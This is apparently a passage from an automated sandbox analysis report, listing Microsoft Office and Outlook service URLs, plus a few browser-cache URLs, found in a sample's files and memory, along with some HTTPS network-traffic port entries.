          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://augloop.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://augloop.office.com/v2
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://autodiscover-s.outlook.com/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://canary.designerapp.
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cdn.designerapp.osi.office.net
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designer-mobile
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/fonts
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-assets
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-dynamic-strings
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-home-screen
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cdn.designerapp.osi.office.net/designerapp/mobile-toolbar
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cdn.entity.
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cdn.hubblecontent.osi.office.net/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
          Source: chromecache_90.17.dr, chromecache_85.17.drString found in binary or memory: https://cdn.socket.io/4.6.0/socket.io.min.js
          Source: chromecache_83.17.drString found in binary or memory: https://cdn.socket.io/4.7.5/socket.io.min.js
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://clients.config.office.net
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://clients.config.office.net/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/DeltaAdvisory
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cortana.ai
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cortana.ai/api
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://cr.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://d.docs.live.net
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://dataservice.o365filtering.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://dataservice.o365filtering.com/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://designerapp.azurewebsites.net
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://designerappservice.officeapps.live.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://dev.cortana.ai
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://devnull.onenote.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://directory.services.
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://ecs.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://ecs.office.com/config/v1/Designer
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://ecs.office.com/config/v2/Office
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://edge.skype.com/registrar/prod
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://edge.skype.com/rps
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://enrichment.osi.office.net/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/v2.1601652342626
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://entitlement.diagnostics.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://fpastorage.cdn.office.net/%s
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://fpastorage.cdn.office.net/firstpartyapp/addins.xml
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://globaldisco.crm.dynamics.com
          Source: chromecache_90.17.dr, chromecache_85.17.drString found in binary or memory: https://google.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://graph.ppe.windows.net
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://graph.ppe.windows.net/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://graph.windows.net
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://graph.windows.net/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/pivots/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://ic3.teams.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://incidents.diagnostics.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://inclient.store.office.com/gyro/client
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://invites.office.com/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://lifecycle.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://login.microsoftonline.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://login.microsoftonline.com/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://login.microsoftonline.com/organizations
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://login.windows.local
          Source: OUTLOOK_16_0_16827_20130-20241025T1621410419-7072.etl.3.drString found in binary or memory: https://login.windows.localMiR
          Source: OUTLOOK_16_0_16827_20130-20241025T1621410419-7072.etl.3.drString found in binary or memory: https://login.windows.localnull
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
          Source: chromecache_90.17.dr, chromecache_85.17.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.pn
          Source: chromecache_85.17.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.sv
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://make.powerautomate.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://management.azure.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://management.azure.com/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://messagebroker.mobile.m365.svc.cloud.microsoft
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://messaging.action.office.com/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://messaging.action.office.com/setcampaignaction
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://messaging.action.office.com/setuseraction16
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://messaging.engagement.office.com/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://messaging.lifecycle.office.com/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://messaging.office.com/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://mss.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://my.microsoftpersonalcontent.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://ncus.contentsync.
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://ncus.pagecontentsync.
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://ods-diagnostics-ppe.trafficmanager.net
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://officeapps.live.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://officeci.azurewebsites.net/api/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://officepyservice.office.net/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://officepyservice.office.net/service.functionality
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://onedrive.live.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://onedrive.live.com/embed?
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://otelrules.azureedge.net
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://otelrules.svc.static.microsoft
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://outlook.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://outlook.office.com/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://outlook.office365.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://outlook.office365.com/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://outlook.office365.com/connectors
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://pages.store.office.com/review/query
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://powerlift.acompli.net
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://pushchannel.1drv.ms
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://res.cdn.office.net
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://res.cdn.office.net/polymer/models
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://safelinks.protection.outlook.com/api/GetPolicy
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://service.officepy.microsoftusercontent.com/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://service.powerapps.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://settings.outlook.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://shell.suite.office.com:1443
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://skyapi.live.net/Activity/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://staging.cortana.ai
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://store.office.cn/addinstemplate
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://store.office.de/addinstemplate
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://substrate.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://substrate.office.com/Notes-Internal.ReadWrite
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://tasks.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://templatesmetadata.office.net/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://useraudit.o365auditrealtimeingestion.manage.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://web.microsoftstream.com/video/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://webshell.suite.office.com
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscovery.ashx
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://wus2.contentsync.
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://wus2.pagecontentsync.
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://www.odwebp.svc.ms
          Source: chromecache_90.17.dr, chromecache_85.17.drString found in binary or memory: https://www.w3schools.com/w3css/4/w3.css
          Source: 8C6F3B38-A420-461A-850D-087F4A7AAAA1.3.drString found in binary or memory: https://www.yammer.com
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
